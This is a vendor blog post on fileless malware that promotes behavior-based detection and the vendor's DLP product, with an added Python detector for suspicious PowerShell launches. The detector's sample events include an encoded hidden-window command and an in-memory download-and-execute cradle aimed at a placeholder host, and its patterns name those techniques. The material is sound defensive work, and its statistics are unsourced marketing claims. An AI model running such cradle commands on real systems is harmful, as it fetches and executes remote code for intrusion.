Taking on the Threat of Fileless Malware
Over the past two years, the IT industry has faced an important shift in the way cyber criminals go about their attacks.
Some of the biggest names in the field of cyber security have been tracking the growing threat of fileless malware attacks and the unique danger they pose to the digital sphere.
Under the Radar
Malware attacks can be divided into two broad categories:
In file-based attacks, criminals install malicious software on a computer, or trick users into downloading it themselves. Once resident on the system, the program executes its payload independently. In fileless attacks, on the other hand, the malware infecting the machine is not a separate piece of software but a toolkit that leverages applications already present on the machine. Programs ranging from built-in operating system tools such as Microsoft's PowerShell or Windows Management Instrumentation (WMI) to common web browsers are used to execute malicious code on the machine.
The numbers on fileless malware’s upward trend have been disconcerting to say the least.
Researchers have estimated that nearly 30 percent of all attacks during 2017 involved fileless malware, up from 20 percent in 2016. IT leaders expect this number to rise to 35 percent over the current year.
The reason criminals prefer to go fileless is simple: these forms of malware are more effective. Fileless attacks are ten times more likely to succeed than file-based hacks. Because such attacks don't install new software on a user's computer, antivirus tools are more likely to miss them. Most cyber defense systems rely on signatures and other markers on programs and files to flag them as dangerous. If the program responsible for attacking the computer is not malicious software but an application already marked as "safe", antivirus tools can be useless in detecting the problem.
Taking on the Threat
There are two approaches enterprises can take to address the danger posed by the rise of fileless malware:
Since fileless malware capitalizes on a user's own applications to do its dirty work, it relies on weaknesses present in these programs. To stay protected, experts have always emphasized staying on top of patching all standard programs, including operating systems, task automation tools, shells, and browsers.
While keeping programs patched is a step in the right direction, it doesn’t quite go far enough in answering the threat of fileless attacks.
Patching is an important preventive measure, but it isn't a foolproof solution. Businesses are often using unsupported programs for which patches aren't even available. Human error can lead to IT personnel failing to patch company applications promptly. Even the most meticulous patching practices won't solve the zero-day exploit problem, in which criminals are the first to discover a weakness. Even more fundamentally, patching doesn't address the unique danger of fileless malware, namely that, once an infection succeeds, these programs circumvent conventional antivirus detection.
To counter this feature of fileless attacks, behavior-based defense systems may be helpful.
Such solutions are not based on predetermined markers that identify threatening programs. Rather, they detect suspicious patterns of behavior that indicate a system has been compromised. This is the one consistent weakness of fileless malware, as these attacks require the computer to execute highly unusual commands in unusual orders and sequences.
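As an added illustration, not part of the original post, the Python below shows what a behavior-based check of the kind just described can look like: it scores constructed process-creation events for a script host such as PowerShell being launched by an Office application or the WMI provider host, for encoded or hidden-window command lines, and for in-memory download-and-execute cradles. The event field names, the parent/child lists and the alert threshold are assumptions, not the product's logic.

```python
import base64
import re

# Constructed sample process-creation events, not real telemetry. The field
# names (parent, image, cmdline) are assumptions; map them to your EDR schema.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc ZQBjAGgAbwAgAGgAaQA="},
    {"parent": "wmiprvse.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://placeholder.invalid/x')\""},
    {"parent": "svchost.exe", "image": "notepad.exe", "cmdline": "notepad.exe"},
]

# Parents that rarely have a legitimate reason to launch a script host (assumed list).
RISKY_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wmiprvse.exe", "mshta.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# PowerShell accepts abbreviated switches, so match -e / -ec / -enc / -encodedcommand.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)
STEALTH = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b|-ep\s+bypass", re.I)
CRADLE = re.compile(r"IEX|Invoke-Expression|DownloadString|FromBase64String", re.I)

def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of UTF-16LE text; surface it for the analyst."""
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(ev):
    """Return the behavioral indicators one event trips (empty list = nothing unusual)."""
    hits = []
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    if image in SCRIPT_HOSTS and parent in RISKY_PARENTS:
        hits.append(f"{image} spawned by {parent}")
    m = ENCODED_FLAG.search(cmd)
    if m:
        hits.append(f"encoded command, decodes to {decode_encoded_command(m.group(1))!r}")
    if STEALTH.search(cmd):
        hits.append("hidden-window / no-profile / policy-bypass switches")
    if CRADLE.search(cmd):
        hits.append("in-memory download-and-execute cradle")
    return hits

def triage(events, threshold=2):
    """Flag events tripping at least `threshold` indicators; a lone hit is noisy on admin hosts."""
    return [(ev["parent"], ev["cmdline"], hits) for ev in events
            if len(hits := analyze_event(ev)) >= threshold]
```

Note that the scheduled backup script launched from Explorer trips nothing, while the same PowerShell binary launched from Word or WMI with encoded or cradle-style arguments is flagged, which is exactly the file-agnostic distinction the paragraph above describes.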
GTB Gives Users the Edge
GTB's Smart DLP solutions meet the fileless threat head-on. Artificially intelligent algorithms identify the presence of malicious programs attempting to exfiltrate sensitive data from a system. This means even attacks with no "file footprint" cannot avoid detection.
GTB's data protection solutions give companies the ability to maintain the highest level of control over all their data. Since the DLP programs can identify even partial data matches, managers remain alert to any attempts at data exfiltration. In this way, GTB's systems address the insider threat as well, helping to ensure that neither a company's personnel nor its digital applications become the means by which data is compromised or lost.